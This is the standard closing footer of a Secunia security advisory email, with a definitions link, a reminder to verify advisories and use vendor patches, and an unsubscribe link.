Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------